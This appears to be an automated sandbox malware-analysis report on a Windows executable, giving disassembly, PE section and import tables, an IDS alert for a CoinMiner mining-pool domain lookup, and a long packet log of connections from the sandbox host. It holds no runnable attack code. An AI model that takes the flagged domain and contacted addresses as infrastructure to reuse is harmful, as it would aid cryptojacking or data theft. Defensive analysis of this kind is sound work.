                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        inc eax
                                                                                        push ebx
                                                                                        dec eax
                                                                                        sub esp, 20h
                                                                                        cmp byte ptr [00034F5Ch], 00000000h
                                                                                        mov ebx, ecx
                                                                                        jne 00007F92C12052B9h
                                                                                        cmp ecx, 01h
                                                                                        jnbe 00007F92C12052BCh
                                                                                        call 00007F92C120599Ah
                                                                                        test eax, eax
                                                                                        je 00007F92C120527Ah
                                                                                        test ebx, ebx
                                                                                        jne 00007F92C1205276h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [00034F46h]
                                                                                        call 00007F92C1213BC2h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3e0bc0x78.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000xeb4.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x430000x231c.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x758.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3b4600x1c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b3200x140.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x438.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x2afb00x2b00040bf1edebd1304ce1b08c50cb556d4dbFalse0.5458416606104651data6.5002315273868IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x2c0000x12f360x130000904c2e66ce6b6bb1e0de054e88ceb30False0.5160875822368421data5.827951258090788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x3f0000x33b80xe00ae0f42b168987b17129506ccc4960b21False0.13392857142857142firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes1.8264700601019173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0x430000x231c0x2400ffc5390666982cab67e3c9bf8e263bc3False0.4784071180555556data5.382434020909434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        _RDATA0x460000x1f40x200771f0b097891d31289bb68f0eb426e66False0.529296875data3.713242247775091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x470000xeb40x100047d8e897636a16013dcfc0453b14792dFalse0.407958984375data5.340979003299043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x480000x7580x8007ecf18b15822e1aa4c79b9a361f07c79False0.546875data5.250941834312499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x470e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.39305054151624547
                                                                                        RT_GROUP_ICON0x479900x14data1.15
                                                                                        RT_MANIFEST0x479a40x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                        DLLImport
                                                                                        USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                        COMCTL32.dll
                                                                                        KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetModuleFileNameW, CreateSymbolicLinkW, GetCPInfo, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, GetProcAddress, GetSystemTimeAsFileTime, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                        ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                        GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        06/05/24-03:56:42.216265UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)6162553192.168.2.41.1.1.1
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jun 5, 2024 03:56:27.328036070 CEST4974580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:27.333034039 CEST8049745208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:27.333112001 CEST4974580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:27.334147930 CEST4974580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:27.338979006 CEST8049745208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:27.933069944 CEST8049745208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:28.070555925 CEST4974580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:28.972179890 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:28.972270012 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:28.972373962 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:28.989514112 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:28.989564896 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.598455906 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.598656893 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:29.600593090 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:29.600625038 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.600899935 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.656549931 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:29.700575113 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.832097054 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.832321882 CEST44349746185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:29.832597971 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:29.871469021 CEST49746443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:33.592907906 CEST4974580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:40.129899979 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:40.134752035 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:40.134882927 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:40.134970903 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:40.139765024 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030531883 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030555010 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030571938 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030631065 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030726910 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.030726910 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.030833960 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030848026 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030863047 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030884027 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030900002 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030905962 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.030926943 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.031006098 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.031260014 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.032826900 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.034902096 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.034924984 CEST44349749185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.035104036 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.038224936 CEST8049748216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.039174080 CEST4974880192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:41.054214954 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.054231882 CEST44349749185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.656369925 CEST44349749185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.656867027 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.656887054 CEST44349749185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.658360004 CEST44349749185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:41.658838034 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.660531044 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:41.660531044 CEST49749443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:42.008409977 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.013492107 CEST8049750208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:42.013706923 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.013809919 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.018601894 CEST8049750208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:42.576900959 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.581825972 CEST8049752208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:42.581907988 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.581944942 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:42.586826086 CEST8049752208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:42.602694988 CEST8049750208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:42.753962040 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:43.121025085 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.121062040 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.121170998 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.161906004 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.161931038 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.200323105 CEST8049752208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.320601940 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:43.681196928 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:43.681282997 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.681364059 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:43.707135916 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:43.707237005 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.762628078 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.762695074 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.765248060 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.765256882 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.765469074 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.779722929 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.824491978 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.904519081 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.904731035 CEST44349753185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.906258106 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:43.907957077 CEST49753443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:44.550458908 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.551034927 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.551106930 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.552824974 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.553000927 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.554209948 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.554352999 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.554553986 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.554553986 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.554655075 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.554718018 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.617599010 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.866913080 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.866975069 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.867115974 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.867182016 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.868026018 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.868172884 CEST44349754149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.868238926 CEST49754443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.869429111 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.869477034 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:44.869537115 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.904984951 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:44.905006886 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.739866018 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.740199089 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:45.740228891 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.743758917 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.743825912 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:45.744935036 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:45.745019913 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.745230913 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:45.745239973 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.745261908 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:45.745274067 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.952544928 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:45.952616930 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:46.660264015 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:46.660315990 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:46.660357952 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:46.660379887 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:46.660926104 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:46.661003113 CEST44349755149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:46.661056042 CEST49755443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:46.661304951 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:46.668256998 CEST8049752208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:46.668315887 CEST4975280192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:49.623342991 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:49.628956079 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:49.629060030 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:49.629136086 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:49.634280920 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:49.745934010 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:49.745971918 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:49.746085882 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:49.747168064 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:49.747184992 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.715728045 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.715903997 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:50.806344032 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806404114 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806441069 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806477070 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806495905 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.806509018 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806531906 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.806545019 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806577921 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806615114 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806619883 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.806742907 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806778908 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.806786060 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.807215929 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.809624910 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.814996004 CEST8049757216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.815042019 CEST4975780192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:56:50.816859961 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:50.816883087 CEST44349759185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.816962957 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:50.848973989 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:50.849023104 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.850019932 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.850992918 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:50.851505041 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:50.851516962 CEST44349759185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:50.892537117 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.092052937 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.094357967 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.094368935 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.095309973 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.095314980 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.096350908 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.096358061 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.096468925 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.096473932 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.377609968 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.378315926 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.378417015 CEST44349758149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.378478050 CEST49758443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.389175892 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.389300108 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.389381886 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.389780045 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:51.389863968 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.456732035 CEST44349759185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.457202911 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:51.457215071 CEST44349759185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.460840940 CEST44349759185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:51.460910082 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:51.462716103 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:51.462884903 CEST49759443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:52.259562016 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.259737015 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.262702942 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.262759924 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.263509035 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.264822006 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.308577061 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.527116060 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.527286053 CEST44349760149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.527693033 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.528955936 CEST49760443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.594485998 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.594558954 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:52.594625950 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.594870090 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:52.594892025 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.435909033 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.437654972 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.437673092 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.702991009 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.703156948 CEST44349761149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.703221083 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.703520060 CEST49761443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.770761013 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.770823002 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:53.770895958 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.771166086 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:53.771188974 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.622483969 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.623701096 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.623718977 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.883558035 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.884016991 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.884062052 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.884242058 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.884255886 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.884336948 CEST49762443192.168.2.4149.154.167.220
